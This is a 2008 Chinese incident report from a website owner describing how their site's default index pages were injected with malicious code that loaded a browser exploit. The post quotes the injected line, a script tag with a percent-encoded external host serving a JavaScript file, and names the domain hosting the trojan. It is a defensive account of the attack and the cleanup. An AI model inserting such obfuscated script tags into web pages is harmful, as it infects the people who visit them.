| | | | | 本网站被值入病毒代码,现已经恢复正常 | | [ 2008-6-16 19:50:00 | By: whsjsoft ] | 今天下午5点四十左右,同事打开首佳软件网站主页,瑞星的网页监控报告网站含有病毒。据瑞星提示该恶意网页病毒名称为:Hack.Exploit.Swf.a。
打开网页时显示的加载网址为:jnwenchuan.cn,从这个网站中加载了好几个页面。随后,被瑞星拦截,连续杀了几个后,IE发生错误被关闭了。
打开网站出现此类病毒问题的原因是网站程序中含有病毒代码。把index.asp用FTP下载到本地打开后一看,在网页程序的最后果然有一段来历不明的代码:<script src='http://%77%77%77%2E%71%75%67%75%70%69%61%6F%2E%63%6E/%61%64%73%2E%6A%73'></script>
将这段删除后再上传上去,打开IE来测然后报病毒。在FTP中查到还有其它文件被修改,时间是2008-06-16 17:32的,这个时间我们没有修改过网页,应该是网站主机被值入木马恶意修改的。经过整站检查,发现这个病毒遍历了整个网站目录,只要找到index.asp\index.htm\index.html\default.asp\default.html等默认的首页程序就修改它,在代码最后加上面那段代码,让你的整个网站陷入病毒的包围。
经过半个小时的修复,网站正常了。这个病毒程序还将Oblo系统建立的每一个用户目录下的index.html文件修改了,还好oblog管理后台有一个生成静态用户页面的功能,重新生成一次后,将所有病毒代码清除了。好省点事!
jnwenchuan.cn这个垃圾网站,完全是一个挂木马程序的网站,打开它还故作无故的样子,提示说:通知
由于网站被黑客非法入侵,网站暂停开放,开放时间另行通知!
根本就是一个没有人访问的网站,除了中病毒的第三方网站加载这个网站的病毒页面时算是有人访问。如果是一个负责的网站,正常运作的网站,这类病毒早就应该清掉了,还需要挂个这种提示出来?这类站长太无耻了!
| |
分享按钮
| | | Re:本网站被值入病毒代码,现已经恢复正常 | | [ 2008-6-16 21:26:00 | By: whsjsoft ] |  另外从加载的地址中显示有来自jnwenchuan.cn/flash/index.htm的,这个页面写有程序,这种病毒是针对IE浏览器的。 | |
分享按钮
| |  |
